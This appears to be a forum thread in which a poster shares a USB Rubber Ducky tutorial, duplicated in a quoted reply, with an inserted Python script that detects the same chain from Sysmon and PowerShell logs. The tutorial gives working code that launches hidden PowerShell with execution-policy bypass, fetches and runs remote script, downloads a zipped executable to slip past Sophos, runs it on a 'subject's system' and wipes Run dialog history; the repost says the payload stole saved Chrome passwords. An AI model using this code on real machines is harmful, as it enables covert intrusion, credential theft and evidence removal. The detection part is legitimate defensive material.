
3 Second PowerShell Execution. (As much powershell code as you want!)


WAZ


How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 characters long, which takes the ducky only around 2 seconds to input.

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as Hostinger or 000webhost to create this file, although remember that these servers may not have 100% uptime.

Script for website:

The code on my website looks something like this...

Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract the .ZIP file, which lets us get past a web protection software called Sophos that would otherwise block the .EXE we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the Run box history that the ducky creates.

Finally, we have to set up the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky:

DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must have an internet connection.

PS: I'm not very good at PowerShell Scripting :wacko:
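From the defender's side, the chain in this post leaves a recognisable trail: a PowerShell host started from the Run dialog (parent explorer.exe) with a hidden window and ExecutionPolicy Bypass, a web fetch piped into Invoke-Expression, an executable dropped under %TEMP% and started by PowerShell, and RunMRU values being removed. The following Python script is an added example that is not code from the post or from Hak5; it runs that detection logic over constructed Sysmon-style process (ID 1) and registry (ID 12) events plus a PowerShell script block event (4104). The event field names, file paths, SID and URL in the sample data are assumptions made for the example.

```python
"""Detection logic for the chain in the post: hidden PowerShell launched from the
Run dialog, remote text fed to Invoke-Expression, an .exe dropped under %TEMP% and
started, then RunMRU values deleted. Event fields (EventID, Image, ParentImage,
CommandLine, TargetObject, ScriptBlockText) are an assumed Sysmon/4104 style."""
import re

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}
RUNMRU_KEY = r"\software\microsoft\windows\currentversion\explorer\runmru"
FETCH_RE = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile", re.I)
IEX_RE = re.compile(r"invoke-expression|\biex\b", re.I)

def _has_switch(tokens, names, value_prefix):
    """powershell.exe accepts any unambiguous prefix of a switch name (-W, -Win,
    -WindowStyle) plus the -ep alias, so match prefixes rather than exact spellings."""
    for tok, nxt in zip(tokens, tokens[1:]):
        stem = tok[1:].lower() if tok.startswith("-") else ""
        if stem and any(n.startswith(stem) for n in names) and nxt.lower().startswith(value_prefix):
            return True
    return False

def command_line_indicators(cmd):
    """Sorted list of suspicious features present in one command line."""
    tokens, found = cmd.split(), set()
    if _has_switch(tokens, ("windowstyle",), "hid"):
        found.add("hidden_window")
    if _has_switch(tokens, ("executionpolicy", "ep"), "bypass"):
        found.add("execution_policy_bypass")
    if FETCH_RE.search(cmd):
        found.add("remote_fetch")
    if IEX_RE.search(cmd):
        found.add("invoke_expression")
    return sorted(found)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_download_cradle(ev):
    """PowerShell host started with a command line that fetches and evaluates remote text."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) not in POWERSHELL_HOSTS:
        return None
    ind = command_line_indicators(ev.get("CommandLine", ""))
    if "remote_fetch" in ind and "invoke_expression" in ind:
        if _basename(ev.get("ParentImage", "")) == "explorer.exe":  # GUI+R runs via explorer
            ind.append("launched_from_run_dialog")
        return {"rule": "powershell_download_cradle", "indicators": ind}
    return None

def detect_temp_exec(ev):
    """PowerShell host spawning an executable that lives under a Temp directory."""
    image = ev.get("Image", "").lower()
    if ev.get("EventID") == 1 and "\\temp\\" in image \
            and _basename(ev.get("ParentImage", "")) in POWERSHELL_HOSTS:
        return {"rule": "temp_executable_spawned_by_powershell", "indicators": [image]}
    return None

def detect_runmru_tamper(ev):
    """RunMRU history wiped: registry value delete by a PowerShell host (Sysmon 12)
    or a logged script block (4104) that removes values from the key."""
    eid = ev.get("EventID")
    if eid == 12 and RUNMRU_KEY in ev.get("TargetObject", "").lower() \
            and _basename(ev.get("Image", "")) in POWERSHELL_HOSTS:
        return {"rule": "runmru_history_cleared", "indicators": ["registry_delete"]}
    text = ev.get("ScriptBlockText", "").lower()
    if eid == 4104 and "runmru" in text and re.search(r"remove-item(property)?", text):
        return {"rule": "runmru_history_cleared", "indicators": ["script_block"]}
    return None

def analyze(events):
    """Run every rule over every event; one alert per (event, rule) hit, in event order."""
    alerts = []
    for idx, ev in enumerate(events):
        for rule in (detect_download_cradle, detect_temp_exec, detect_runmru_tamper):
            hit = rule(ev)
            if hit:
                alerts.append({"event": idx, **hit})
    return alerts

# Constructed sample telemetry (paths, SID and URL are made up for this example).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest "
                    "www.example.invalid/script.txt; Invoke-Expression $a"},
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\Remake.exe", "ParentImage": PS,
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\Remake.exe"},
    {"EventID": 12, "Image": PS,
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a"},
    {"EventID": 4104, "ScriptBlockText": '$path = "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU"\n'
                                         "foreach($item in $arr) { Remove-ItemProperty -Path $path -Name $item }"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",  # benign control
     "CommandLine": r"powershell -NoProfile -File C:\scripts\nightly-backup.ps1"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Two points worth noting when turning this into real rules. The post's one-liner spells the switches as `-W` and `-Exec`, so a rule that looks for the literal strings `-WindowStyle Hidden` or `-ExecutionPolicy Bypass` misses it; the prefix matching above follows how powershell.exe itself resolves switch names. The 4104 rule only has data to work with if PowerShell Script Block Logging is enabled, and the registry rule needs Sysmon configured to record value deletes under the RunMRU key; with both in place the history wipe at the end of the script becomes an indicator rather than a cover-up.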


2 minutes ago, WAZ said:

How does it work / what is it?

I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 characters long, which takes the ducky only around 2 seconds to input.

Tutorial:

First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as Hostinger or 000webhost to create this file, although remember that these servers may not have 100% uptime.

Script for website:

The code on my website looks something like below. You can put whatever you want in here. Personally, I used it to download an .EXE which dumps saved Chrome passwords into a database using an API we created.


Add-Type -AssemblyName System.IO.Compression.FileSystem
function Unzip
{
    param([string]$zipfile, [string]$outpath)

    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
}

$path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
$arr = (Get-Item -Path $path).Property 
$url = "www.linkToEndPayload"
$output = "$env:temp/test.zip";
$out = "$env:temp/Remake.txt";

Remove-Item -Path $output
Invoke-WebRequest -Uri $url -OutFile $output

Unzip $output "$env:temp/"
Rename-Item -Path $out -NewName "Remake.exe"

Start-Process -FilePath "$env:temp/Remake.exe"

foreach($item in $arr) 
{ 
   if($item -ne "MRUList") 
   { 
     Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
   } 
}

This code downloads the .EXE payload (which is stored in a .ZIP file). We will be running this file on our subject's system. Then the code uses an imported C# library to extract the .ZIP file, which lets us get past a web protection software called Sophos that would otherwise block the .EXE we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the Run box history that the ducky creates.

Finally, we have to set up the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

Script for ducky:


DELAY 500
GUI r
DELAY 100
STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
ENTER

That's it! Very fast PowerShell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must have an internet connection.

PS: I'm not very good at PowerShell Scripting :wacko: + First post! 

 

